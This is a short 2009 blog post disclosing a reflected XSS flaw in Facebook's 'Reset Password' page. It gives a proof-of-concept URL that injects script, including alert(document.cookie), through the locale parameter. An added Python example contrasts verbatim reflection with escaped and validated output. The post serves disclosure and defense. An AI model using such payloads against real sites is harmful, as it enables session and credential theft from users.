
 Facebook's "Reset Password" page suffers major XSS flaw

Written by DP

Saturday, 3 January 2009

Hey you all! Our best wishes for 2009!!! :) ;)

DaiMon has once more discovered a new critical cross-site scripting vulnerability which affects the Facebook "Reset Password" page.

Malicious users can inject code to phish credentials and other sensitive personal information from millions of Facebook members.

We hope that this serious flaw gets fixed quickly, as is usually the case with security flaws in Facebook.

XSS:

http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Mirror:
http://www.xssed.com/mirror/55951/
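
The `">` sequence at the start of the payload suggests that the `locale` value is reflected inside a double-quoted HTML attribute without escaping. The following is an added example, not code from Facebook or from this post: the template, the locale pattern and the `en_US` fallback are assumptions made for illustration. It renders the parameter from the URL above first verbatim, then through a handler that validates the value and escapes it for the attribute context.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# URL quoted in the post above.
POC_URL = ("http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3E"
           "alert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E")

# Hypothetical template: the locale value lands in a double-quoted attribute.
TEMPLATE = '<input type="hidden" name="locale" value="{locale}">'

# Assumed locale shape: two lowercase letters, underscore, two uppercase letters.
LOCALE_RE = re.compile(r"[a-z]{2}_[A-Z]{2}")
DEFAULT_LOCALE = "en_US"  # assumed fallback


def locale_from_url(url):
    """Return the URL-decoded locale parameter, as a web framework would."""
    values = parse_qs(urlsplit(url).query).get("locale", [])
    return values[0] if values else ""


def render_vulnerable(locale):
    """Reflect the parameter verbatim: a quote in it ends the attribute early."""
    return TEMPLATE.format(locale=locale)


def render_escaped(locale):
    """Escape for the attribute context: quotes and angle brackets become entities."""
    return TEMPLATE.format(locale=html.escape(locale, quote=True))


def render_hardened(locale):
    """Reject anything that is not a well-formed locale, then escape anyway."""
    if not LOCALE_RE.fullmatch(locale):
        locale = DEFAULT_LOCALE
    return render_escaped(locale)


if __name__ == "__main__":
    value = locale_from_url(POC_URL)
    print("decoded  :", value)
    print("verbatim :", render_vulnerable(value))
    print("escaped  :", render_escaped(value))
    print("hardened :", render_hardened(value))
```

Validation and escaping are kept as separate layers so that a later loosening of the pattern does not reintroduce the reflection.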
